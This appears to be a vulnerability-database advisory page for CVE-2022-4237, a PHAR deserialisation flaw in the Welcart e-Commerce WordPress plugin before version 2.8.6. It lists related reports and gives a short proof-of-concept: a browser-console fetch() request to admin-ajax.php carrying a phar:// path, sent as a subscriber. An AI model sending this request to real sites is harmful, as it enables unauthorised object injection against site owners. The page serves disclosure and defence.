Welcart e-Commerce < 2.8.6 - Subscriber+ PHAR Deserialisatio
Reporter | Title | Published | Views | Family All 5 |
---|---|---|---|---|
![]() | Welcart e-Commerce < 2.8.6 - Subscriber+ PHAR Deserialisation | 5 Dec 202200:00 | – | wpvulndb |
![]() | CVE-2022-4237 Welcart e-Commerce < 2.8.6 - Subscriber+ PHAR Deserialisation | 2 Jan 202321:49 | – | cvelist |
![]() | Design/Logic Flaw | 2 Jan 202322:15 | – | prion |
![]() | CVE-2022-4237 | 2 Jan 202322:15 | – | nvd |
![]() | CVE-2022-4237 | 2 Jan 202322:15 | – | cve |
Run the below command in the developer console of the web browser while being on the blog as subscriber user
fetch("/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"method": "POST",
"body": 'action=wel_check_progress_ajax&progressfile=phar://path-to-uploaded-phar.phar/log.txt',
"credentials": "include"
}).then(response => response.text())
.then(data => console.log(data));
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo